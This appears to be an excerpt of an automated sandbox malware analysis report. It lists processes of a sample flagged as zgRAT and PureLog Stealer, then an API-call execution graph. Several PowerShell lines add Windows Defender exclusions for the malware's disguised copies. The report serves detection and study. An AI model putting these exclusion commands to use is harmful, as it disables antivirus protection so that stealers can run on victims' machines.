                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\y4s1cmk0\y4s1cmk0.cmdline"
                                                            Imagebase:0x7ff6c2dc0000
                                                            File size:2'759'232 bytes
                                                            MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            General

                                                            Target ID:11
                                                            Start time:07:19:15
                                                            Start date:13/01/2025
                                                            Path:C:\Recovery\upfc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Recovery\upfc.exe
                                                            Imagebase:0xbf0000
                                                            File size:36'628'992 bytes
                                                            MD5 hash:CADD0C3B32099635F889BA630C4697F4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\upfc.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\upfc.exe, Author: Joe Security
                                                            Antivirus matches:
                                                            • Detection: 100%, Avira
                                                            • Detection: 100%, Joe Sandbox ML
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:12
                                                            Start time:07:19:15
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:13
                                                            Start time:07:19:16
                                                            Start date:13/01/2025
                                                            Path:C:\Recovery\upfc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Recovery\upfc.exe
                                                            Imagebase:0xa80000
                                                            File size:36'628'992 bytes
                                                            MD5 hash:CADD0C3B32099635F889BA630C4697F4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:14
                                                            Start time:07:19:16
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFE67.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC93052B3B6324D99AC47AF4632C48EC.TMP"
                                                            Imagebase:0x7ff750960000
                                                            File size:52'744 bytes
                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:15
                                                            Start time:07:19:16
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\smysgui2\smysgui2.cmdline"
                                                            Imagebase:0x7ff6c2dc0000
                                                            File size:2'759'232 bytes
                                                            MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            General

                                                            Target ID:16
                                                            Start time:07:19:16
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:17
                                                            Start time:07:19:16
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD.tmp" "c:\Windows\System32\CSCC80490C767BA46838348DF24F5FE6FCA.TMP"
                                                            Imagebase:0x7ff750960000
                                                            File size:52'744 bytes
                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:28
                                                            Start time:07:19:19
                                                            Start date:13/01/2025
                                                            Path:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Users\Default\NetHood\explorer.exe
                                                            Imagebase:0x8a0000
                                                            File size:36'628'992 bytes
                                                            MD5 hash:CADD0C3B32099635F889BA630C4697F4
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe, Author: Joe Security
                                                            Antivirus matches:
                                                            • Detection: 100%, Avira
                                                            • Detection: 100%, Joe Sandbox ML
                                                            Has exited:true

                                                            General

                                                            Target ID:32
                                                            Start time:07:19:19
                                                            Start date:13/01/2025
                                                            Path:C:\Browserhost\LaSqLWtOcizKrlm.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Browserhost\LaSqLWtOcizKrlm.exe
                                                            Imagebase:0xc10000
                                                            File size:36'628'992 bytes
                                                            MD5 hash:CADD0C3B32099635F889BA630C4697F4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Browserhost\LaSqLWtOcizKrlm.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Browserhost\LaSqLWtOcizKrlm.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Browserhost\LaSqLWtOcizKrlm.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Browserhost\LaSqLWtOcizKrlm.exe, Author: Joe Security
                                                            Antivirus matches:
                                                            • Detection: 100%, Avira
                                                            • Detection: 100%, Avira
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 100%, Joe Sandbox ML
                                                            Has exited:true

                                                            General

                                                            Target ID:36
                                                            Start time:07:19:19
                                                            Start date:13/01/2025
                                                            Path:C:\Browserhost\LaSqLWtOcizKrlm.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Browserhost\LaSqLWtOcizKrlm.exe
                                                            Imagebase:0x10000
                                                            File size:36'628'992 bytes
                                                            MD5 hash:CADD0C3B32099635F889BA630C4697F4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:37
                                                            Start time:07:19:19
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\upfc.exe'
                                                            Imagebase:0x7ff7be880000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:38
                                                            Start time:07:19:19
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Saved Games\LaSqLWtOcizKrlm.exe'
                                                            Imagebase:0x7ff7be880000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:39
                                                            Start time:07:19:19
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            General

                                                            Target ID:40
                                                            Start time:07:19:19
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\SoftwareDistribution\winlogon.exe'
                                                            Imagebase:0x7ff7be880000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:41
                                                            Start time:07:19:19
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            General

                                                            Target ID:42
                                                            Start time:07:19:19
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\NetHood\explorer.exe'
                                                            Imagebase:0x7ff7be880000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:43
                                                            Start time:07:19:19
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            General

                                                            Target ID:44
                                                            Start time:07:19:19
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Browserhost\LaSqLWtOcizKrlm.exe'
                                                            Imagebase:0x7ff7be880000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:45
                                                            Start time:07:19:19
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            General

                                                            Target ID:46
                                                            Start time:07:19:19
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Browserhost\intoHostperf.exe'
                                                            Imagebase:0x7ff7be880000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:47
                                                            Start time:07:19:19
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            General

                                                            Target ID:48
                                                            Start time:07:19:19
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            General

                                                            Target ID:49
                                                            Start time:07:19:20
                                                            Start date:13/01/2025
                                                            Path:C:\ProgramData\SoftwareDistribution\winlogon.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Users\All Users\SoftwareDistribution\winlogon.exe"
                                                            Imagebase:0x4c0000
                                                            File size:36'628'992 bytes
                                                            MD5 hash:CADD0C3B32099635F889BA630C4697F4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProgramData\SoftwareDistribution\winlogon.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\SoftwareDistribution\winlogon.exe, Author: Joe Security
                                                            Antivirus matches:
                                                            • Detection: 100%, Avira
                                                            • Detection: 100%, Joe Sandbox ML
                                                            Has exited:true

                                                            General

                                                            Target ID:50
                                                            Start time:07:19:20
                                                            Start date:13/01/2025
                                                            Path:C:\ProgramData\SoftwareDistribution\winlogon.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Users\All Users\SoftwareDistribution\winlogon.exe"
                                                            Imagebase:0x7f0000
                                                            File size:36'628'992 bytes
                                                            MD5 hash:CADD0C3B32099635F889BA630C4697F4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:51
                                                            Start time:07:19:20
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZtWwdj1Vck.bat"
                                                            Imagebase:0x7ff7f4520000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:52
                                                            Start time:07:19:20
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:53
                                                            Start time:07:19:21
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\System32\chcp.com
                                                            Wow64 process (32bit):false
                                                            Commandline:chcp 65001
                                                            Imagebase:0x7ff78f070000
                                                            File size:14'848 bytes
                                                            MD5 hash:33395C4732A49065EA72590B14B64F32
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:54
                                                            Start time:07:19:22
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\System32\PING.EXE
                                                            Wow64 process (32bit):false
                                                            Commandline:ping -n 10 localhost
                                                            Imagebase:0x7ff7ece90000
                                                            File size:22'528 bytes
                                                            MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:55
                                                            Start time:07:19:24
                                                            Start date:13/01/2025
                                                            Path:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Users\Default\NetHood\explorer.exe
                                                            Imagebase:0x690000
                                                            File size:36'628'992 bytes
                                                            MD5 hash:CADD0C3B32099635F889BA630C4697F4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:56
                                                            Start time:07:19:24
                                                            Start date:13/01/2025
                                                            Path:C:\Browserhost\intoHostperf.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Browserhost\intoHostperf.exe
                                                            Imagebase:0x3c0000
                                                            File size:36'628'992 bytes
                                                            MD5 hash:CADD0C3B32099635F889BA630C4697F4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:57
                                                            Start time:07:19:25
                                                            Start date:13/01/2025
                                                            Path:C:\Browserhost\intoHostperf.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Browserhost\intoHostperf.exe
                                                            Imagebase:0x410000
                                                            File size:36'628'992 bytes
                                                            MD5 hash:CADD0C3B32099635F889BA630C4697F4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:78
                                                            Start time:07:20:21
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\System32\Conhost.exe
                                                            Wow64 process (32bit):
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:9.5%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:9.3%
                                                              Total number of Nodes:1511
                                                              Total number of Limit Nodes:42
                                                              execution_graph 25410 42a440 GdipCloneImage GdipAlloc 25411 433a40 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25460 441f40 CloseHandle 23603 42e44b 23604 42e3f4 23603->23604 23604->23603 23606 42e85d 23604->23606 23632 42e5bb 23606->23632 23608 42e86d 23609 42e8ca 23608->23609 23618 42e8ee 23608->23618 23610 42e7fb DloadReleaseSectionWriteAccess 6 API calls 23609->23610 23611 42e8d5 RaiseException 23610->23611 23628 42eac3 23611->23628 23612 42e966 LoadLibraryExA 23613 42e9c7 23612->23613 23614 42e979 GetLastError 23612->23614 23617 42e9d2 FreeLibrary 23613->23617 23619 42e9d9 23613->23619 23615 42e9a2 23614->23615 23623 42e98c 23614->23623 23620 42e7fb DloadReleaseSectionWriteAccess 6 API calls 23615->23620 23616 42ea37 GetProcAddress 23621 42ea95 23616->23621 23622 42ea47 GetLastError 23616->23622 23617->23619 23618->23612 23618->23613 23618->23619 23618->23621 23619->23616 23619->23621 23624 42e9ad RaiseException 23620->23624 23641 42e7fb 23621->23641 23625 42ea5a 23622->23625 23623->23613 23623->23615 23624->23628 23625->23621 23627 42e7fb DloadReleaseSectionWriteAccess 6 API calls 23625->23627 23629 42ea7b RaiseException 23627->23629 23628->23604 23630 42e5bb ___delayLoadHelper2@8 6 API calls 23629->23630 23631 42ea92 23630->23631 23631->23621 23633 42e5c7 23632->23633 23634 42e5ed 23632->23634 23649 42e664 23633->23649 23634->23608 23636 42e5cc 23637 42e5e8 23636->23637 23652 42e78d 23636->23652 23657 42e5ee GetModuleHandleW GetProcAddress GetProcAddress 23637->23657 23640 42e836 23640->23608 23642 42e82f 23641->23642 23643 42e80d 23641->23643 23642->23628 23644 42e664 DloadReleaseSectionWriteAccess 3 API calls 23643->23644 23645 42e812 23644->23645 23646 42e82a 23645->23646 23647 42e78d DloadProtectSection 3 API calls 23645->23647 23660 42e831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 23646->23660 23647->23646 23658 42e5ee GetModuleHandleW GetProcAddress GetProcAddress 23649->23658 23651 42e669 23651->23636 23654 42e7a2 DloadProtectSection 23652->23654 23653 42e7a8 23653->23637 23654->23653 23655 42e7dd VirtualProtect 23654->23655 23659 42e6a3 VirtualQuery GetSystemInfo 23654->23659 23655->23653 23657->23640 23658->23651 23659->23655 23660->23642 25413 42e455 14 API calls ___delayLoadHelper2@8 23697 42cd58 23699 42ce22 23697->23699 23704 42cd7b _wcschr 23697->23704 23713 42c793 _wcslen _wcsrchr 23699->23713 23725 42d78f 23699->23725 23701 42d40a 23703 421fbb CompareStringW 23703->23704 23704->23699 23704->23703 23705 42ca67 SetWindowTextW 23705->23713 23710 42c855 SetFileAttributesW 23711 42c90f GetFileAttributesW 23710->23711 23723 42c86f _abort _wcslen 23710->23723 23711->23713 23715 42c921 DeleteFileW 23711->23715 23713->23701 23713->23705 23713->23710 23716 42cc31 GetDlgItem SetWindowTextW SendMessageW 23713->23716 23719 42cc71 SendMessageW 23713->23719 23724 421fbb CompareStringW 23713->23724 23747 42b314 23713->23747 23751 42a64d GetCurrentDirectoryW 23713->23751 23753 41a5d1 6 API calls 23713->23753 23754 41a55a FindClose 23713->23754 23755 42b48e 76 API calls 2 library calls 23713->23755 23756 433e3e 23713->23756 23715->23713 23717 42c932 23715->23717 23716->23713 23718 414092 _swprintf 51 API calls 23717->23718 23720 42c952 GetFileAttributesW 23718->23720 23719->23713 23720->23717 23721 42c967 MoveFileW 23720->23721 23721->23713 23722 42c97f MoveFileExW 23721->23722 23722->23713 23723->23711 23723->23713 23752 41b991 51 API calls 3 library calls 23723->23752 23724->23713 23728 42d799 _abort _wcslen 23725->23728 23726 42d9e7 23726->23713 23727 42d8a5 23769 41a231 23727->23769 23728->23726 23728->23727 23729 42d9c0 23728->23729 23772 421fbb CompareStringW 23728->23772 23729->23726 23732 42d9de ShowWindow 23729->23732 23732->23726 23735 42d925 23774 42dc3b 6 API calls 23735->23774 23736 42d97b CloseHandle 23737 42d994 23736->23737 23738 42d989 23736->23738 23737->23729 23775 421fbb CompareStringW 23738->23775 23739 42d8d1 23739->23726 23739->23735 23739->23736 23741 42d91b ShowWindow 23739->23741 23741->23735 23743 42d93d 23743->23736 23744 42d950 GetExitCodeProcess 23743->23744 23744->23736 23745 42d963 23744->23745 23745->23736 23748 42b31e 23747->23748 23749 42b3f0 ExpandEnvironmentStringsW 23748->23749 23750 42b40d 23748->23750 23749->23750 23750->23713 23751->23713 23752->23723 23753->23713 23754->23713 23755->23713 23757 438e54 23756->23757 23758 438e61 23757->23758 23759 438e6c 23757->23759 23790 438e06 23758->23790 23761 438e74 23759->23761 23768 438e7d _abort 23759->23768 23762 438dcc _free 20 API calls 23761->23762 23765 438e69 23762->23765 23763 438e82 23797 4391a8 20 API calls _abort 23763->23797 23764 438ea7 HeapReAlloc 23764->23765 23764->23768 23765->23713 23768->23763 23768->23764 23798 437a5e 7 API calls 2 library calls 23768->23798 23776 41a243 23769->23776 23772->23727 23773 41b6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 23773->23739 23774->23743 23775->23737 23784 42ec50 23776->23784 23779 41a261 23786 41bb03 23779->23786 23780 41a23a 23780->23739 23780->23773 23782 41a275 23782->23780 23783 41a279 GetFileAttributesW 23782->23783 23783->23780 23785 41a250 GetFileAttributesW 23784->23785 23785->23779 23785->23780 23787 41bb10 _wcslen 23786->23787 23788 41bbb8 GetCurrentDirectoryW 23787->23788 23789 41bb39 _wcslen 23787->23789 23788->23789 23789->23782 23791 438e44 23790->23791 23792 438e14 _abort 23790->23792 23800 4391a8 20 API calls _abort 23791->23800 23792->23791 23794 438e2f RtlAllocateHeap 23792->23794 23799 437a5e 7 API calls 2 library calls 23792->23799 23794->23792 23795 438e42 23794->23795 23795->23765 23797->23765 23798->23768 23799->23792 23800->23795 25415 42c793 107 API calls 5 library calls 25416 438268 55 API calls _free 25463 437f6e 52 API calls 3 library calls 25417 42a070 10 API calls 25419 42b270 99 API calls 25465 411f72 128 API calls __EH_prolog 25420 411075 84 API calls 24746 419a74 24749 419a7e 24746->24749 24747 419b9d SetFilePointer 24748 419bb6 GetLastError 24747->24748 24752 419ab1 24747->24752 24748->24752 24749->24747 24750 41981a 79 API calls 24749->24750 24751 419b79 24749->24751 24749->24752 24750->24751 24751->24747 24753 419f7a 24754 419f88 24753->24754 24755 419f8f 24753->24755 24756 419f9c GetStdHandle 24755->24756 24763 419fab 24755->24763 24756->24763 24757 41a003 WriteFile 24757->24763 24758 419fd4 WriteFile 24759 419fcf 24758->24759 24758->24763 24759->24758 24759->24763 24761 41a095 24765 416e98 77 API calls 24761->24765 24763->24754 24763->24757 24763->24758 24763->24759 24763->24761 24764 416baa 78 API calls 24763->24764 24764->24763 24765->24754 25422 42a400 GdipDisposeImage GdipFree 25423 42d600 70 API calls 25424 436000 QueryPerformanceFrequency QueryPerformanceCounter 25426 43f200 51 API calls 25468 432900 6 API calls 4 library calls 25470 43a700 21 API calls 25471 411710 86 API calls 25472 42ad10 73 API calls 25429 43f421 21 API calls __vswprintf_c_l 25430 42c220 93 API calls _swprintf 25432 411025 29 API calls 25476 42f530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25477 42ff30 LocalFree 25283 43bb30 25284 43bb42 25283->25284 25285 43bb39 25283->25285 25287 43ba27 25285->25287 25288 4397e5 _abort 38 API calls 25287->25288 25289 43ba34 25288->25289 25307 43bb4e 25289->25307 25291 43ba3c 25316 43b7bb 25291->25316 25294 43ba53 25294->25284 25295 438e06 __vswprintf_c_l 21 API calls 25296 43ba64 25295->25296 25297 43ba96 25296->25297 25323 43bbf0 25296->25323 25299 438dcc _free 20 API calls 25297->25299 25299->25294 25301 43ba91 25333 4391a8 20 API calls _abort 25301->25333 25303 43bada 25303->25297 25334 43b691 26 API calls 25303->25334 25304 43baae 25304->25303 25305 438dcc _free 20 API calls 25304->25305 25305->25303 25308 43bb5a ___scrt_is_nonwritable_in_current_image 25307->25308 25309 4397e5 _abort 38 API calls 25308->25309 25314 43bb64 25309->25314 25311 43bbe8 _abort 25311->25291 25314->25311 25315 438dcc _free 20 API calls 25314->25315 25335 438d24 38 API calls _abort 25314->25335 25336 43ac31 EnterCriticalSection 25314->25336 25337 43bbdf LeaveCriticalSection _abort 25314->25337 25315->25314 25317 434636 __cftof 38 API calls 25316->25317 25318 43b7cd 25317->25318 25319 43b7ee 25318->25319 25320 43b7dc GetOEMCP 25318->25320 25321 43b805 25319->25321 25322 43b7f3 GetACP 25319->25322 25320->25321 25321->25294 25321->25295 25322->25321 25324 43b7bb 40 API calls 25323->25324 25325 43bc0f 25324->25325 25328 43bc60 IsValidCodePage 25325->25328 25330 43bc16 25325->25330 25332 43bc85 _abort 25325->25332 25326 42fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25327 43ba89 25326->25327 25327->25301 25327->25304 25329 43bc72 GetCPInfo 25328->25329 25328->25330 25329->25330 25329->25332 25330->25326 25338 43b893 GetCPInfo 25332->25338 25333->25297 25334->25297 25336->25314 25337->25314 25339 43b977 25338->25339 25344 43b8cd 25338->25344 25341 42fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25339->25341 25343 43ba23 25341->25343 25343->25330 25348 43c988 25344->25348 25347 43ab78 __vswprintf_c_l 43 API calls 25347->25339 